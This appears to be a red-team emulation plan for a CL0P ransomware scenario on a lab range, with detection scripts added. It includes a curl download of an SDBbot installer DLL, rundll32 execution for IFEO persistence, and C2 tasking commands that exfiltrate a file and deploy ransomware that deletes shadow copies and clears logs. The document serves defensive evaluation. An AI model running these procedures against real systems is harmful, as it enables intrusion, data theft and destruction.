# CL0P Scenario Overview

Legend of symbols:

- 💡 - callout notes
- - extremely important note
- ➡️ - switching to another session
- - disconnect from RDP
- 🔴 - sign out of RDP
- 📷 - take a screenshot
- 🕑 - record timestamp

# Step 0 - Red Setup

## ☣️ Procedures

- Initiate an RDP session to the Kali attack host corsair (223.246.0.70):

  | IP | Username | Password |
  | --- | --- | --- |
  | 223.246.0.70 | op1 | Subpar-Parabola |

- In a new terminal window, start the evalsC2server, ensuring the following handlers are enabled:

  - Simple File Server
  - SDBbot

  ```shell
  cd cl0p/Resources/control_server
  sudo go build -o controlServer main.go
  sudo ./controlServer -c config/cl0p.yml
  ```

  When sudo prompts for a password, enter `Subpar-Parabola`.

- Right-click within the terminal window and click "Split Terminal Horizontally". In the new terminal, change directory to the location of evalsC2client.py and use this terminal for tasking implants:

  ```shell
  cd cl0p/Resources/control_server
  ```

- ➡️ Initiate an RDP session to the Windows jumpbox spitfire (223.246.0.90).

# Step 0 - Range Setup

- ➡️ From the Windows jumpbox spitfire (223.246.0.90), initiate an RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook:

  | Hostname | Username | Password |
  | --- | --- | --- |
  | diagonalley.encryptpotter.net | encryptpotter.net\griphook | Feral-Studs |

- Search for Command Prompt and execute the following command:

  ```
  curl -o C:\Users\griphook\AppData\Roaming\IFInstaller.dll http://curse-breaker.org/files/installer.dll
  ```

- Close the Command Prompt window.

# Step 1 - Persistence (Evaluation Step 5)

## 🎤 Voice Track

The victim executes the downloaded SDBbot Installer (C:\Users\griphook\AppData\Roaming\IFInstaller.dll) using rundll32.exe.

The SDBbot Installer contains an embedded RAT payload and, on execution, writes shellcode and the embedded payload as a binary blob to the registry at HKLM\SOFTWARE\Microsoft\skw. The installer then establishes persistence using image file execution options injection:

- The SDBbot Installer saves the SDBbot Loader DLL to C:\Windows\temp\tmp8AB2.tmp and creates a symbolic link C:\Windows\System32\msverload.dll pointing to the Loader DLL
- The SDBbot Installer adds msverload.dll to the VerifierDlls value for winlogon.exe

## ☣️ Procedures

- In the RDP session to the Windows victim workstation diagonalley (10.55.4.21) as encryptpotter.net\griphook, search for Command Prompt and right-click to Run as Administrator.

- In the Admin Command Prompt, execute the SDBbot Installer using rundll32:

  ```
  rundll32.exe C:\Users\griphook\AppData\Roaming\IFInstaller.dll,install
  ```

- 📷 Confirm and screenshot that the payload was executed in Command Prompt.

## 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

| Red Team Activity | Source Code Link | ATT&CK Technique | Relevant CTI Report |
| --- | --- | --- | --- |
| IFInstaller.dll is executed via rundll32.exe | - | T1218.011 System Binary Proxy Execution: Rundll32 | - |
| IFInstaller.dll contains an embedded PE file | Load and decrypt embedded shellcode | T1027.009 Obfuscated Files or Information: Embedded Payloads | Proofpoint - 2019 |
| SDBbot Installer stores the loader shellcode and embedded PE file in HKLM\SOFTWARE\Microsoft\skw | register_shellcode_transacted | T1112 Modify Registry | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot Installer installs persistence via image file execution options VerifierDlls | verifier.cpp | T1546.012 Event Triggered Execution: Image File Execution Options Injection | Proofpoint - 2019 |
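A defender-side audit for the three persistence artifacts this step describes, added here as example code that is not part of the emulation plan or the SDBbot source. The `skw` key name and the `msverload.dll` path come from the voice track above; the Image File Execution Options key path and the `VerifierDlls`/`GlobalFlag` value names are the standard Windows locations this technique abuses.

```powershell
# Added audit script; not part of the emulation plan or the SDBbot source.
# IFEO key path and VerifierDlls/GlobalFlag value names are standard Windows locations;
# the skw key and msverload.dll path are taken from this scenario's description.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$findings = @()

# 1. Any image with a VerifierDlls value loads that DLL at process start. Outside of
#    Application Verifier testing it should be empty, and never set for winlogon.exe.
foreach ($key in (Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue)) {
    $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
    if ($props.VerifierDlls) {
        $findings += [pscustomobject]@{
            Check  = 'IFEO VerifierDlls'
            Target = $key.PSChildName
            Detail = "VerifierDlls=$($props.VerifierDlls); GlobalFlag=$($props.GlobalFlag)"
        }
    }
}

# 2. The installer parks the shellcode and RAT payload under HKLM\SOFTWARE\Microsoft\skw.
$skw = 'HKLM:\SOFTWARE\Microsoft\skw'
if (Test-Path -Path $skw) {
    $findings += [pscustomobject]@{
        Check  = 'Payload registry key'
        Target = $skw
        Detail = 'Values: ' + ((Get-Item -Path $skw).Property -join ', ')
    }
}

# 3. The loader is exposed in System32 through a symbolic link named msverload.dll;
#    LinkType/Target show whether the file is a link and where it points.
$link = 'C:\Windows\System32\msverload.dll'
$item = Get-Item -LiteralPath $link -Force -ErrorAction SilentlyContinue
if ($item) {
    $findings += [pscustomobject]@{
        Check  = 'System32 loader link'
        Target = $link
        Detail = "LinkType=$($item.LinkType); Target=$($item.Target -join ', ')"
    }
}

if ($findings.Count -gt 0) { $findings | Format-Table -AutoSize -Wrap }
else { 'No SDBbot IFEO persistence artifacts found.' }
```

Run it from an elevated PowerShell on the victim workstation after Step 1 to confirm the artifacts are visible to host-based tooling, and again after cleanup to confirm they are gone.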

# Step 2 - Command and Control (Evaluation Step 6)

## 🎤 Voice Track

Eventually encryptpotter.net\griphook logs back in to diagonalley (10.55.4.21), triggering the image file execution options persistence mechanism.

The SDBbot Loader component reads the binary blob stored in the registry and executes the shellcode. The shellcode loads and executes the SDBbot RAT payload in memory. The SDBbot RAT establishes C2 communication over TCP port 443 and sends discovery output (domain name, computer name, country code, OS version, user privileges, and whether a proxy is configured).

## ☣️ Procedures

- Return to your RDP session to diagonalley (10.55.4.21) as encryptpotter.net\griphook.

- 🔴 Sign out of the RDP session and sign back in to diagonalley (10.55.4.21) as encryptpotter.net\griphook:

  | Hostname | Username | Password |
  | --- | --- | --- |
  | diagonalley.encryptpotter.net | encryptpotter.net\griphook | Feral-Studs |

- On the Desktop, open Inventory_gdlRyr.xls (opens in LibreOffice Calc).

- ➡️ Return to the Kali attack host corsair (223.246.0.70).

- 📷 Confirm and screenshot C2 registration of the SDBbot RAT.

## 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

| Red Team Activity | Source Code Link | ATT&CK Technique | Relevant CTI Report |
| --- | --- | --- | --- |
| Operating system loads SDBbot Loader into winlogon.exe | - | T1546.012 Event Triggered Execution: Image File Execution Options Injection | Proofpoint - 2019 |
| SDBbot Loader reflectively loads the SDBbot RAT | - | T1620 Reflective Code Loading | Proofpoint - 2019 |
| SDBbot RAT uses Windows APIs | core.cpp | T1106 Native API | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT discovers current process integrity via OpenProcessToken, GetCurrentProcess, and GetTokenInformation | core.cpp | T1057 Process Discovery | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT discovers domain name via gethostname and getaddrinfo | core.cpp | T1082 System Information Discovery | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT discovers computer name via GetComputerName | core.cpp | T1082 System Information Discovery | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT discovers username via GetUserNameA | core.cpp | T1033 System Owner/User Discovery | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT discovers country code via GetUserGeoID and GetGeoInfoW | core.cpp | T1082 System Information Discovery | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT discovers the Windows version via RtlGetVersion | core.cpp | T1082 System Information Discovery | Proofpoint - 2019, IBM X-Force - 2020 |
| SDBbot RAT connects to the C2 server over TCP port 443 | comms.cpp | T1095 Non-Application Layer Protocol | Proofpoint - 2019, IBM X-Force - 2020 |

# Step 3 - Discovery and Exfiltration (Evaluation Step 7)

## 🎤 Voice Track

The attacker will then use SDBbot to discover and exfiltrate files of interest from the workstation.

## ☣️ Procedures

- Task the SDBbot RAT to enumerate a user directory before exfiltrating files:

  ```shell
  ./evalsC2client.py --set-task 0x0000000F '{"id":"execute", "arg":"dir C:\\users\\"}'
  ```

- Task the SDBbot RAT to exfiltrate files:

  ```shell
  ./evalsC2client.py --set-task 0x0000000F '{"id":"read", "arg":"C:\\Users\\griphook\\Desktop\\Findings_reZGaJ.doc"}'
  ```

- 📷 Confirm and screenshot the successful file download from the C2 server output.

## 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

| Red Team Activity | Source Code Link | ATT&CK Technique | Relevant CTI Report |
| --- | --- | --- | --- |
| SDBbot RAT executes dir | core.cpp | T1083 File and Directory Discovery | - |
| SDBbot RAT exfiltrates files | core.cpp | T1041 Exfiltration Over C2 Channel | Cybereason - 2020 |

# Step 4 - Defense Evasion and Impact (Evaluation Step 8)

## 🎤 Voice Track

The attacker will then use SDBbot to ingress and execute the CL0P ransomware on diagonalley (10.55.4.21). On execution, CL0P performs the following actions:

- Discover the keyboard layout to check the language and retrieve the font used by the system
- Delete shadow copies and resize shadow storage
- Disable boot recovery options
- Stop various services
- Stop various processes
- Enumerate logical drives and files
- Suppress error dialogues and encrypt files using AES, appending the .C_I0p extension to encrypted files
- Leave ransom notes in affected folders
- Clear Windows Event Logs
- Delete itself on completion

## ☣️ Procedures

- From the Kali attack host corsair (223.246.0.70), task the SDBbot RAT to ingress the CL0P executable:

  ```shell
  ./evalsC2client.py --set-task 0x0000000F '{"id":"download", "payload":"main.exe", "arg":"C:\\Windows\\System32\\SysMonitor.exe"}'
  ```

- Task the SDBbot RAT to execute CL0P:

  ```shell
  ./evalsC2client.py --set-task 0x0000000F '{"id":"execute", "arg":"C:\\Windows\\System32\\SysMonitor.exe"}'
  ```

- Allow 5-10 minutes for CL0P to finish running.

- 📷 Screenshot the result of CL0P execution from the C2 server output.

## 🔍 Reference Code & Reporting

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

| Red Team Activity | Source Code Link | ATT&CK Technique | Relevant CTI Report |
| --- | --- | --- | --- |
| SDBbot RAT ingresses CL0P executable | core.cpp | T1105 Ingress Tool Transfer | Palo Alto - 2021 |
| SDBbot RAT executes CL0P executable | core.cpp | T1059.003 Command and Scripting Interpreter: Windows Command Shell | Palo Alto - 2021, Proofpoint - 2019, Cybereason - 2020 |
| CL0P checks keyboard layout via GetKeyboardLayout and GetTextCharset | guardrails.cpp | T1614.001 System Location Discovery: System Language Discovery | McAfee - 2019 |
| CL0P executes commands via cmd.exe /c | core.cpp | T1059.003 Command and Scripting Interpreter: Windows Command Shell | Cybereason - 2020 |
| CL0P deletes shadow copies and resizes shadow storage | defense.cpp | T1490 Inhibit System Recovery | McAfee - 2019, Sectrio - 2023 |
| CL0P disables boot recovery options | defense.cpp | T1490 Inhibit System Recovery | McAfee - 2019 |
| CL0P stops services | defense.cpp | T1489 Service Stop | McAfee - 2019 |
| CL0P stops processes via OpenProcess and TerminateProcess | defense.cpp | T1489 Service Stop | McAfee - 2019 |
| CL0P suppresses error dialogues via SetErrorMode | defense.cpp | T1562.006 Impair Defenses: Indicator Blocking | McAfee - 2019 |
| CL0P encrypts files using AES, appending the .C_I0p extension to encrypted files | encryption.cpp | T1486 Data Encrypted for Impact | McAfee - 2019, Cybereason - 2020 |
| CL0P leaves ransom notes in affected folders | encryption.cpp | T1491.001 Defacement: Internal Defacement | Cybereason - 2020, McAfee - 2019, Palo Alto - 2021, Sectrio - 2023 |
| CL0P clears Windows Event Logs | defense.cpp | T1070.001 Indicator Removal: Clear Windows Event Logs | Sectrio - 2023, Trend Micro - 2022 |
| CL0P deletes itself | defense.cpp | T1070.004 Indicator Removal: File Deletion | McAfee - 2019, Sectrio - 2023 |
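A defender-side hunt for the impact artifacts this step describes, added here as example code that is not part of the emulation plan or the CL0P source. The `.C_I0p` extension, the shadow-copy deletion and the event-log clearing come from the voice track above; event IDs 1102 (Security log cleared) and 104 (other log cleared) are the standard Windows events that record a clear, and the 24-hour lookback window is an assumption.

```powershell
# Added hunting script; not part of the emulation plan or the CL0P source.
# The .C_I0p extension and the shadow-copy / log-clearing behaviour come from this
# scenario; 1102 and 104 are the standard Windows log-cleared event IDs.
$results = [ordered]@{}

# 1. Encrypted files: walk fixed drives only (DriveType 3) to keep the search bounded.
$drives = Get-CimInstance -ClassName Win32_LogicalDisk -Filter 'DriveType=3' |
    Select-Object -ExpandProperty DeviceID
$encrypted = foreach ($d in $drives) {
    Get-ChildItem -Path "$d\" -Filter '*.C_I0p' -Recurse -File -Force -ErrorAction SilentlyContinue
}
$results['EncryptedFileCount']   = @($encrypted).Count
$results['SampleEncryptedFiles'] = @($encrypted | Select-Object -First 5 -ExpandProperty FullName)

# 2. Shadow copies: CL0P deletes them, so a count of zero on a host that normally keeps
#    them is a signal even before any .C_I0p files are found.
$results['ShadowCopyCount'] = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue).Count

# 3. Log clearing: Windows writes 1102 (Security) and 104 (System, for other logs) after
#    the clear, so these records survive the action they describe. 24h lookback is assumed.
$since = (Get-Date).AddHours(-24)
$results['SecurityLogCleared'] = @(Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1102; StartTime=$since} -ErrorAction SilentlyContinue).Count
$results['OtherLogsCleared']   = @(Get-WinEvent -FilterHashtable @{LogName='System';   Id=104;  StartTime=$since} -ErrorAction SilentlyContinue).Count

[pscustomobject]$results | Format-List
```

Run it from an elevated PowerShell on diagonalley after the 5-10 minute wait; the counts give a quick check that the impact actions reached the host before the detection review begins.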

# 🔚 End of Execution